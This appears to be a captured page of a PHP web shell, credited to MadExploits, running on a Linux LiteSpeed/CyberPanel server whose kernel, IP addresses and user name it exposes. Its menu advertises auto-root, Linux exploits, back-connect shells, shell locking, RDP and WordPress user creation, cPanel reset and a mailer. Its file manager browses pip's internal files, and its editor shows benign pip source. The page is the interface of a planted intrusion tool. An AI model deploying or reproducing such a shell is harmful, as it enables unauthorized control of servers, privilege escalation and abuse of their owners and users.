Linux cyberpanel 5.15.0-156-generic #166-Ubuntu SMP Sat Aug 9 00:02:46 UTC 2025 x86_64
LiteSpeed
: 160.191.175.3 | : 216.73.216.114
Cant Read [ /etc/named.conf ]
8.2.29
aodai6801
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
lib /
python3 /
dist-packages /
pip /
_internal /
cli /
[ HOME SHELL ]
Name
Size
Permission
Action
__pycache__
[ DIR ]
drwxr-xr-x
__init__.py
132
B
-rw-r--r--
autocompletion.py
6.52
KB
-rw-r--r--
base_command.py
7.85
KB
-rw-r--r--
cmdoptions.py
27.86
KB
-rw-r--r--
command_context.py
760
B
-rw-r--r--
main.py
2.41
KB
-rw-r--r--
main_parser.py
2.55
KB
-rw-r--r--
parser.py
10.54
KB
-rw-r--r--
progress_bars.py
10.1
KB
-rw-r--r--
req_command.py
18.23
KB
-rw-r--r--
spinners.py
4.96
KB
-rw-r--r--
status_codes.py
116
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : command_context.py
from contextlib import ExitStack, contextmanager from typing import ContextManager, Iterator, TypeVar _T = TypeVar("_T", covariant=True) class CommandContextMixIn: def __init__(self) -> None: super().__init__() self._in_main_context = False self._main_context = ExitStack() @contextmanager def main_context(self) -> Iterator[None]: assert not self._in_main_context self._in_main_context = True try: with self._main_context: yield finally: self._in_main_context = False def enter_context(self, context_provider: ContextManager[_T]) -> _T: assert self._in_main_context return self._main_context.enter_context(context_provider)
Close